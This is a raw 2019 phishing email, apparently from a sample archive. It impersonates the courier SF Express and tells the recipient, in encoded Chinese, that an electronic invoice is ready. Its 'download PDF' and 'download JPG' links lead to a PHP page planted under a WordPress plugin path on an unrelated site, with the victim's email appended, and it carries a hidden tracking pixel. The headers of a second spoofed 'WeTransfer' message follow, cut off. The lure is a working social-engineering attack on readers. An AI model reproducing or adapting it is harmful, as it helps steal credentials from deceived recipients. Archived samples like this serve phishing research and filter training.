From: "TNT | Sf Expres" <gaia@excellentsistemas.com.br>
To: jose@monkey.org
Subject: =?UTF-8?B?VE5UIHwgU2ZFeHByZXNzIOmhuuS4sOeUteWtkOWPkeelqOmAmuefpSA=?=
Date: 14 Mar 2019 12:28:08 -0700
Message-ID: <20190314122808.9765E60CFE02488E@excellentsistemas.com.br>
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Status: O
X-Status: 
X-Keywords:                  
X-UID: 62

<br><div class=3D"gmail_quote"><div dir=3D"ltr"><div class=3D"gmail_quote">=
<div><div id=3D"m_-1688183537512443673m_3867587514984553029m_-7805823033955=
645185m_-1613234380254737065m_8921462594819464755m_-8028234578460808480ydp7=
729422yahoo_quoted_2254599639" class=3D"m_-1688183537512443673m_38675875149=
84553029m_-7805823033955645185m_-1613234380254737065m_8921462594819464755m_=
-8028234578460808480ydp7729422yahoo_quoted"><div style=3D"font-family:'Helv=
etica Neue',Helvetica,Arial,sans-serif;font-size:13px;color:#26282a">
                <div><div id=3D"m_-1688183537512443673m_3867587514984553029=
m_-7805823033955645185m_-1613234380254737065m_8921462594819464755m_-8028234=
578460808480ydp7729422yiv4575562715"><div><div>&#23562;&#25964;&#30340;&#39=
034;&#20016;&#36895;&#36816;&#23458;&#25143;&#65306;&nbsp;</div>
<div>&#24744;&#22909; <a rel=3D"nofollow" href=3D"mailto:jose@monkey.org" t=
arget=3D"_blank"><span style=3D"TEXT-DECORATION:underline">jose@monkey.org<=
/span></a></div>
<div>&nbsp;</div>
<div>&#24863;&#35874;&#24744;&#36873;&#25321;&#39034;&#20016;&#36895;&#3681=
6;&#20026;&#24744;&#25552;&#20379;&#30340;&#25910;&#27966;&#26381;&#21153;&=
#12290; &#24744;&#30003;&#35831;&#30340;&#30005;&#23376;&#21457;&#31080;&#2=
4050;&#25104;&#21151;&#24320;&#20855;&#65281;&#21457;&#31080;&#35814;&#2477=
3;&#22914;&#19979;&#65306;&nbsp;</div>
<div>&#21457;&#31080;&#20195;&#30721;&#65306;0445317466708 <br></div>
<div>&#21457;&#31080;&#21495;&#30721;&#65306;6384921974</div>
<div>&#21457;&#31080;&#37329;&#39069;&#65306;009.440&#20803;&nbsp;</div>
<div>&#21253;&#21547;&#30340;&#36816;&#21333;&#21495;&#65306;</div>
<div>&nbsp;</div>
<div>&nbsp;</div>
<div>&nbsp;</div>
<div>&#24744;&#21487;&#20197;&#28857;&#20987;&#20197;&#19979;&#38142;&#2550=
9;&#19979;&#36733;&#30005;&#23376;&#21457;&#31080;&#12290;</div>
<div>&nbsp;</div>
<div>&nbsp;</div>
<div>1&#12289;<a href=3D"http://sustainableeugene.org/wp-content/plugins/he=
alth-check/includes/_path/script/SFExpress/index.php?email=3Djose@monkey.or=
g" rel=3D"nofollow" target=3D"_blank" data-saferedirecturl=3D"https://www.g=
oogle.com/url?q=3Dhttp://grapplingtechs.com/wp-content/plugins/akismet/.cac=
he/main/SFExpress/index.php?email%3D%250%25&amp;source=3Dgmail&amp;ust=3D15=
52608933779000&amp;usg=3DAFQjCNFlyNpua9wztTof4laPr5bmSQ4Bmw"><span style=3D=
"TEXT-DECORATION:underline">&#19979;&#36733;PDF</span></a>&#26684;&#24335;&=
#30005;&#23376;&#21457;&#31080;&nbsp;</div>
<div>2&#12289;<a href=3D"http://sustainableeugene.org/wp-content/plugins/he=
alth-check/includes/_path/script/SFExpress/index.php?email=3Djose@monkey.or=
g" rel=3D"nofollow" target=3D"_blank" data-saferedirecturl=3D"https://www.g=
oogle.com/url?q=3Dhttp://grapplingtechs.com/wp-content/plugins/akismet/.cac=
he/main/SFExpress/index.php?email%3D%250%25&amp;source=3Dgmail&amp;ust=3D15=
52608933779000&amp;usg=3DAFQjCNFlyNpua9wztTof4laPr5bmSQ4Bmw"><span style=3D=
"TEXT-DECORATION:underline">&#19979;&#36733;JP</span></a>&#26684;&#24335;&#=
30005;&#23376;&#21457;&#31080;&nbsp;</div>
<div>&#31995;&#32479;&#37038;&#31665;&#65292;&#35831;&#21247;&#22238;&#2279=
7;&#12290;&#22914;&#26377;&#38656;&#27714;&#65292;&#35831;&#32852;&#31995;&=
#25910;&#27966;&#21592;&#25110;&#23458;&#26381;&#65292;&#35874;&#35874;&#65=
281;</div></div></div></div>
            </div>
        </div></div></div><div><img id=3D"m_-1688183537512443673m_386758751=
4984553029m_-7805823033955645185m_-1613234380254737065m_8921462594819464755=
sl_img_tracker" class=3D"m_-1688183537512443673m_3867587514984553029m_-7805=
823033955645185m_-1613234380254737065m_8921462594819464755ad-img-tracker" s=
rc=3D"https://ci4.googleusercontent.com/proxy/4FqUe3t5WUDy3bFQfk81yNaE4Gih-=
LNZpJpjxyVLREv9lgKIiFbXldUV0u8Z0Q0lFPXnIlABIMtc_vfvI-gtfKKyb_9g522rH4LVb0Iz=
vHFPpw=3Ds0-d-e1-ft#https://app.adapt.io/mt/track/B23346CF91B7B7A2C08F15513=
84176632" style=3D"display:none;width:1px;height:1px"></div></div>
</div>

From jose@monkey.org Fri Mar 15 14:09:36 2019 +0000
Return-Path: no_reply@wetransfer.com
Delivered-To: jose@monkey.org
X-FDA: 75269638752.32.393DD16
Received: from filter.hostedemail.com (10.5.16.248.rfc1918.com [10.5.16.248])
	by smtpin32.b.hostedemail.com (Postfix) with ESMTP id DB78917247D
	for <jose@monkey.org>; Fri, 15 Mar 2019 14:08:51 +0000 (UTC)
X-Spam-Summary: 85,1,0,9c5c8c922c8956f7,d41d8cd98f00b204,no_reply@wetransfer.com,:,RULES_HIT:4:41:72:146:355:375:379:455:495:800:962:967:973:983:988:989:1189:1208:1224:1260:1263:1311:1313:1314:1345:1381:1431:1432:1433:1434:1436:1437:1513:1515:1516:1517:1521:1566:1571:1588:1589:1710:1714:1730:1747:1777:1792:2198:2199:2393:2525:2527:2553:2568:2610:2629:2640:2682:2685:2693:2859:2902:2933:2937:2939:2942:2945:2947:2951:2954:2975:2976:3000:3022:3138:3139:3140:3141:3142:3148:3867:3870:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4180:4181:4321:4836:5007:6261:6300:6669:6671:6674:6678:8599:8603:8829:8957:9025:9388:9416:9908:10004:10346:11026:11473:11657:11658:11914:12043:12219:12438:12555:12663:12698:12737:12740:12895:12956:12958:12959:12961:12973:12986:13007:13025:13374:14096:21080:21347:21433:21451:21524:21554:21611:21627:21810:21819:30054:30070:30090,0,RBL:93.115.240.147-irl.urbl.hostedemail.com-127.0.0.175,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF
 :not bul
X-HE-Tag: gun52_8764c87050412
X-Filterd-Recvd-Size: 16619
Received: from mail.aystorrent.ro (mail.aystorrent.ro [93.115.240.147])
	by imf09.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Fri, 15 Mar 2019 14:08:50 +0000 (UTC)
Received: from wetransfer.com (unknown [103.99.2.5])
	by mail.aystorrent.ro (Postfix) with ESMTP id 748A4123B5C4
	for <jose@monkey.org>; Fri,  8 Mar 2019 07:14:16 +0200 (EET)
